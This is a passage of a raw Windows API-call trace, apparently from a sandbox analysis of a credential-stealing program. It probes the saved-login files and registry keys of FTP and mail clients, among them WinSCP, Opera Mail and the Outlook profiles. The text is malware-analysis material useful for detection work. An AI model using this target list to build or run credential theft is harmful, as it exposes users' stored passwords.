arglist=0x19fb48 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\GmailNotifierPro\\ConfigData.xml") returned 69 [0129.433] GetProcessHeap () returned 0x6a0000 [0129.433] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8e) returned 0x6bac30 [0129.433] GetProcessHeap () returned 0x6a0000 [0129.433] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0129.434] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.435] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\GmailNotifierPro\\ConfigData.xml") returned 0 [0129.435] GetProcessHeap () returned 0x6a0000 [0129.435] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0129.436] GetProcessHeap () returned 0x6a0000 [0129.436] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bac30 [0129.437] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0129.437] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x6bac30 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0129.437] GetProcessHeap () returned 0x6a0000 [0129.437] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f6a) returned 0x6bb458 [0129.438] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0129.439] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\DeskSoft\\CheckMail", arglist=0x19fb3c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\DeskSoft\\CheckMail") returned 56 [0129.439] GetProcessHeap () returned 0x6a0000 [0129.439] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x74) returned 0x6b8b60 [0129.439] GetProcessHeap () returned 0x6a0000 [0129.439] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0129.440] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.441] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\DeskSoft\\CheckMail") returned 0 [0129.441] GetProcessHeap () returned 0x6a0000 [0129.441] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0129.441] GetProcessHeap () returned 0x6a0000 [0129.442] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8b60 | out: hHeap=0x6a0000) returned 1 [0129.442] GetProcessHeap () returned 0x6a0000 [0129.442] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bac30 [0129.443] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0129.443] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x6bac30 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0129.444] GetProcessHeap () returned 0x6a0000 [0129.444] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f7c) returned 0x6bb458 [0129.445] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0129.446] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\WinFtp Client\\Favorites.dat", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\WinFtp Client\\Favorites.dat") returned 50 [0129.446] GetProcessHeap () returned 0x6a0000 [0129.446] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x68) returned 0x6bae98 [0129.446] GetProcessHeap () returned 0x6a0000 [0129.446] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0129.448] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.448] PathFileExistsW (pszPath="C:\\Program Files (x86)\\WinFtp Client\\Favorites.dat") returned 0 [0129.449] GetProcessHeap () returned 0x6a0000 [0129.449] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bae98 | out: hHeap=0x6a0000) returned 1 [0129.449] GetProcessHeap () returned 0x6a0000 [0129.450] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0129.450] GetProcessHeap () returned 0x6a0000 [0129.450] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e8) returned 0x6bb458 [0129.450] GetProcessHeap () returned 0x6a0000 [0129.450] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x6ab4f0 [0129.450] GetProcessHeap () returned 0x6a0000 [0129.450] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab40 [0129.450] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0129.451] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Martin Prikryl", phkResult=0x6bab40 | out: phkResult=0x6bab40*=0x0) returned 0x2 [0129.451] GetProcessHeap () returned 0x6a0000 [0129.451] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab40 | out: hHeap=0x6a0000) returned 1 [0129.451] GetProcessHeap () returned 0x6a0000 [0129.451] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab40 [0129.452] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0129.452] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\Martin Prikryl", phkResult=0x6bab40 | out: phkResult=0x6bab40*=0x0) returned 0x2 [0129.453] GetProcessHeap () returned 0x6a0000 [0129.453] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab40 | out: hHeap=0x6a0000) returned 1 [0129.453] GetProcessHeap () returned 0x6a0000 [0129.453] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0129.460] GetProcessHeap () returned 0x6a0000 [0129.460] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ab4f0 | out: hHeap=0x6a0000) returned 1 [0129.460] GetProcessHeap () returned 0x6a0000 [0129.460] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bac30 [0129.460] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0129.461] SHGetFolderPathW (in: hwnd=0x0, csidl=36, hToken=0x0, dwFlags=0x0, pszPath=0x6bac30 | out: pszPath="C:\\Windows") returned 0x0 [0129.461] GetProcessHeap () returned 0x6a0000 [0129.461] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f5e) returned 0x6bb458 [0129.461] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0129.462] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\32BitFtp.TMP", arglist=0x19fba0 | out: param_1="C:\\Windows\\32BitFtp.TMP") returned 23 [0129.462] GetProcessHeap () returned 0x6a0000 [0129.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x32) returned 0x6ad6a0 [0129.462] GetProcessHeap () returned 0x6a0000 [0129.463] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0129.466] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.466] PathFileExistsW (pszPath="C:\\Windows\\32BitFtp.TMP") returned 0 [0129.466] GetProcessHeap () returned 0x6a0000 [0129.467] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ad6a0 | out: hHeap=0x6a0000) returned 1 [0129.467] GetProcessHeap () returned 0x6a0000 [0129.467] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0129.467] GetProcessHeap () returned 0x6a0000 [0129.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bac30 [0129.468] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0129.468] SHGetFolderPathW (in: hwnd=0x0, csidl=36, hToken=0x0, dwFlags=0x0, pszPath=0x6bac30 | out: pszPath="C:\\Windows") returned 0x0 [0129.468] GetProcessHeap () returned 0x6a0000 [0129.469] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f5e) returned 0x6bb458 [0129.469] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0129.470] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\32BitFtp.ini", arglist=0x19fb94 | out: param_1="C:\\Windows\\32BitFtp.ini") returned 23 [0129.470] GetProcessHeap () returned 0x6a0000 [0129.470] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x32) returned 0x6ad420 [0129.470] GetProcessHeap () returned 0x6a0000 [0129.470] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0129.471] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.471] PathFileExistsW (pszPath="C:\\Windows\\32BitFtp.ini") returned 0 [0129.472] GetProcessHeap () returned 0x6a0000 [0129.472] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ad420 | out: hHeap=0x6a0000) returned 1 [0129.472] GetProcessHeap () returned 0x6a0000 [0129.472] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0129.472] GetProcessHeap () returned 0x6a0000 [0129.472] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bac30 [0129.473] ExpandEnvironmentStringsW (in: lpSrc="%SYSTEMDRIVE%", lpDst=0x6bac30, nSize=0x104 | out: lpDst="C:") returned 0x3 [0129.473] GetProcessHeap () returned 0x6a0000 [0129.473] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f78) returned 0x6bb458 [0129.474] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0129.474] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\FTP Navigator\\Ftplist.txt", arglist=0x19fba0 | out: param_1="C:\\FTP Navigator\\Ftplist.txt") returned 28 [0129.474] GetProcessHeap () returned 0x6a0000 [0129.475] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3c) returned 0x6b4c70 [0129.475] GetProcessHeap () returned 0x6a0000 [0129.475] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0129.476] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.476] PathFileExistsW (pszPath="C:\\FTP Navigator\\Ftplist.txt") returned 0 [0129.476] GetProcessHeap () returned 0x6a0000 [0129.477] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4c70 | out: hHeap=0x6a0000) returned 1 [0129.477] GetProcessHeap () returned 0x6a0000 [0129.477] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0129.477] GetProcessHeap () returned 0x6a0000 [0129.477] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bac30 [0129.478] ExpandEnvironmentStringsW (in: lpSrc="%SYSTEMDRIVE%", lpDst=0x6bac30, nSize=0x104 | out: lpDst="C:") returned 0x3 [0129.478] GetProcessHeap () returned 0x6a0000 [0129.478] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f92) returned 0x6bb458 [0129.478] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0129.479] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\Softwarenetz\\Mailing\\Daten\\mailing.vdt", arglist=0x19fb40 | out: param_1="C:\\Softwarenetz\\Mailing\\Daten\\mailing.vdt") returned 41 [0129.479] GetProcessHeap () returned 0x6a0000 [0129.479] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x56) returned 0x6bae98 [0129.479] GetProcessHeap () returned 0x6a0000 [0129.480] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0129.481] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.481] PathFileExistsW (pszPath="C:\\Softwarenetz\\Mailing\\Daten\\mailing.vdt") returned 0 [0129.481] GetProcessHeap () returned 0x6a0000 [0129.481] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bae98 | out: hHeap=0x6a0000) returned 1 [0129.481] GetProcessHeap () returned 0x6a0000 [0129.482] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0129.482] GetProcessHeap () returned 0x6a0000 [0129.482] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f82) returned 0x6bb458 [0129.482] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0129.483] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\Opera Mail\\Opera Mail\\wand.dat", arglist=0x19fb4c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Mail\\Opera Mail\\wand.dat") returned 68 [0129.483] GetProcessHeap () returned 0x6a0000 [0129.484] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8c) returned 0x6bac30 [0129.484] GetProcessHeap () returned 0x6a0000 [0129.484] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0129.485] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.485] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Mail\\Opera Mail\\wand.dat") returned 0 [0129.485] GetProcessHeap () returned 0x6a0000 [0129.485] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0129.486] GetProcessHeap () returned 0x6a0000 [0129.486] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x410) returned 0x6bb458 [0129.487] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.487] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\Postbox\\Postbox", pszValue="CurrentVersion", pdwType=0x0, pvData=0x6bb458, pcbData=0x19fba4*=0x104 | out: pdwType=0x0, pvData=0x6bb458, pcbData=0x19fba4*=0x104) returned 0x2 [0129.487] GetProcessHeap () returned 0x6a0000 [0129.487] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0129.487] GetProcessHeap () returned 0x6a0000 [0129.487] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x410) returned 0x6bb458 [0129.488] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.489] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\Mozilla\\FossaMail", pszValue="CurrentVersion", pdwType=0x0, pvData=0x6bb458, pcbData=0x19fba4*=0x104 | out: pdwType=0x0, pvData=0x6bb458, pcbData=0x19fba4*=0x104) returned 0x2 [0129.489] GetProcessHeap () returned 0x6a0000 [0129.489] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0129.490] GetProcessHeap () returned 0x6a0000 [0129.490] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bac30 [0129.490] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0129.491] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x6bac30 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0129.492] Sleep (dwMilliseconds=0xa) [0129.514] GetProcessHeap () returned 0x6a0000 [0129.514] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f4a) returned 0x6bb458 [0129.514] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0129.515] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\%s", arglist=0x19f8f4 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\*Mailbox.ini") returned 44 [0129.515] GetProcessHeap () returned 0x6a0000 [0129.515] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x5c) returned 0x6bae98 [0129.515] GetProcessHeap () returned 0x6a0000 [0129.516] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0129.517] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\*Mailbox.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\*mailbox.ini"), lpFindFileData=0x19f908 | out: lpFindFileData=0x19f908*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x207d0, ftCreationTime.dwHighDateTime=0x20000, ftLastAccessTime.dwLowDateTime=0x48, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x6a78a0, ftLastWriteTime.dwHighDateTime=0x6a78a0, nFileSizeHigh=0x6b4588, nFileSizeLow=0x6b4c20, dwReserved0=0x0, dwReserved1=0x19f964, cFileName="ը瞆", cAlternateFileName="뒭蕬͈읩﮵⬤ﭬ\x19䂑@")) returned 0xffffffff [0129.517] GetProcessHeap () returned 0x6a0000 [0129.517] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bae98 | out: hHeap=0x6a0000) returned 1 [0129.518] GetProcessHeap () returned 0x6a0000 [0129.518] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0129.518] GetProcessHeap () returned 0x6a0000 [0129.518] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e8) returned 0x6bb458 [0129.518] GetProcessHeap () returned 0x6a0000 [0129.518] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x6ab4f0 [0129.518] GetProcessHeap () returned 0x6a0000 [0129.518] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa30 [0129.532] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0129.533] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\WinChips\\UserAccounts", phkResult=0x6baa30 | out: phkResult=0x6baa30*=0x0) returned 0x2 [0129.533] GetProcessHeap () returned 0x6a0000 [0129.533] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa30 | out: hHeap=0x6a0000) returned 1 [0129.533] GetProcessHeap () returned 0x6a0000 [0129.534] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0129.534] GetProcessHeap () returned 0x6a0000 [0129.534] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ab4f0 | out: hHeap=0x6a0000) returned 1 [0129.534] GetProcessHeap () returned 0x6a0000 [0129.534] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e8) returned 0x6bb458 [0129.534] GetProcessHeap () returned 0x6a0000 [0129.534] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x6ab4f0 [0129.534] GetProcessHeap () returned 0x6a0000 [0129.534] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9f0 [0129.535] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0129.536] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook", phkResult=0x6ba9f0 | out: phkResult=0x6ba9f0*=0x0) returned 0x2 [0129.536] GetProcessHeap () returned 0x6a0000 [0129.536] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9f0 | out: hHeap=0x6a0000) returned 1 [0129.536] GetProcessHeap () returned 0x6a0000 [0129.536] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baad0 [0129.537] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0129.538] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook", phkResult=0x6baad0 | out: phkResult=0x6baad0*=0x0) returned 0x2 [0129.538] GetProcessHeap () returned 0x6a0000 [0129.538] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baad0 | out: hHeap=0x6a0000) returned 1 [0129.538] GetProcessHeap () returned 0x6a0000 [0129.538] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baad0 [0129.539] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0129.540] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook", phkResult=0x6baad0 | out: phkResult=0x6baad0*=0x218) returned 0x0 [0129.540] GetProcessHeap () returned 0x6a0000 [0129.540] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x410) returned 0x6bb848 [0129.541] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.541] SHEnumKeyExW (in: hkey=0x218, dwIndex=0x0, pszName=0x6bb848, pcchName=0x19fb7c | out: pszName="0a0d020000000000c000000000000046", pcchName=0x19fb7c) returned 0x0 [0129.542] GetProcessHeap () returned 0x6a0000 [0129.542] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab40 [0129.542] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0129.543] RegOpenKeyW (in: hKey=0x218, lpSubKey="0a0d020000000000c000000000000046", phkResult=0x6bab40 | out: phkResult=0x6bab40*=0x210) returned 0x0 [0129.543] GetProcessHeap () returned 0x6a0000 [0129.543] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x410) returned 0x6bbc60 [0129.544] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.544] SHQueryValueExW (in: hkey=0x210, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x6bbc60, pcbData=0x19f6f0*=0x208 | out: pdwType=0x0, pvData=0x6bbc60, pcbData=0x19f6f0*=0x208) returned 0x2 [0129.544] GetProcessHeap () returned 0x6a0000 [0129.545] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0129.545] GetProcessHeap () returned 0x6a0000 [0129.545] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f4a) returned 0x6bbc60 [0129.548] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0129.549] wvsprintfW (in: param_1=0x6bbc60, param_2="%s\\%s", arglist=0x19fb60 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046") returned 88 [0129.549] GetProcessHeap () returned 0x6a0000 [0129.549] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb4) returned 0x6bac30 [0129.549] GetProcessHeap () returned 0x6a0000 [0129.549] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0129.550] GetProcessHeap () returned 0x6a0000 [0129.550] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba970 [0129.550] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0129.551] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", phkResult=0x6ba970 | out: phkResult=0x6ba970*=0x204) returned 0x0 [0129.551] GetProcessHeap () returned 0x6a0000 [0129.551] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x410) returned 0x6bbc60 [0129.552] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.552] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x0, pszName=0x6bbc60, pcchName=0x19fb4c | out: pszName="", pcchName=0x19fb4c) returned 0x103 [0129.553] GetProcessHeap () returned 0x6a0000 [0129.553] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0129.554] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0129.554] RegCloseKey (hKey=0x204) returned 0x0 [0129.554] GetProcessHeap () returned 0x6a0000 [0129.554] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba970 | out: hHeap=0x6a0000) returned 1 [0129.554] GetProcessHeap () returned 0x6a0000 [0129.555] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0129.556] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0129.557] RegCloseKey (hKey=0x210) returned 0x0 [0129.557] GetProcessHeap () returned 0x6a0000 [0129.557] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab40 | out: hHeap=0x6a0000) returned 1 [0129.558] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.558] SHEnumKeyExW (in: hkey=0x218, dwIndex=0x1, pszName=0x6bb848, pcchName=0x19fb7c | out: pszName="13dbb0c8aa05101a9bb000aa002fc45a", pcchName=0x19fb7c) returned 0x0 [0129.558] GetProcessHeap () returned 0x6a0000 [0129.558] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9e0 [0129.559] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0129.560] RegOpenKeyW (in: hKey=0x218, lpSubKey="13dbb0c8aa05101a9bb000aa002fc45a", phkResult=0x6ba9e0 | out: phkResult=0x6ba9e0*=0x210) returned 0x0 [0129.560] GetProcessHeap () returned 0x6a0000 [0129.560] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x410) returned 0x6bbc60 [0129.561] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.561] SHQueryValueExW (in: hkey=0x210, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x6bbc60, pcbData=0x19f6f0*=0x208 | out: pdwType=0x0, pvData=0x6bbc60, pcbData=0x19f6f0*=0x208) returned 0x2 [0129.562] GetProcessHeap () returned 0x6a0000 [0129.562] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0129.562] GetProcessHeap () returned 0x6a0000 [0129.562] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f4a) returned 0x6bbc60 [0129.563] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0129.564] wvsprintfW (in: param_1=0x6bbc60, param_2="%s\\%s", arglist=0x19fb60 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a") returned 88 [0129.564] GetProcessHeap () returned 0x6a0000 [0129.564] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb4) returned 0x6bac30 [0129.564] GetProcessHeap () returned 0x6a0000 [0129.565] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0129.578] GetProcessHeap () returned 0x6a0000 [0129.578] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab40 [0129.579] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0129.580] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", phkResult=0x6bab40 | out: phkResult=0x6bab40*=0x204) returned 0x0 [0129.580] GetProcessHeap () returned 0x6a0000 [0129.580] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x410) returned 0x6bbc60 [0129.581] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.582] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x0, pszName=0x6bbc60, pcchName=0x19fb4c | out: pszName="", pcchName=0x19fb4c) returned 0x103 [0129.582] GetProcessHeap () returned 0x6a0000 [0129.582] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0129.583] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0129.584] RegCloseKey (hKey=0x204) returned 0x0 [0129.584] GetProcessHeap () returned 0x6a0000 [0129.584] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab40 | out: hHeap=0x6a0000) returned 1 [0129.584] 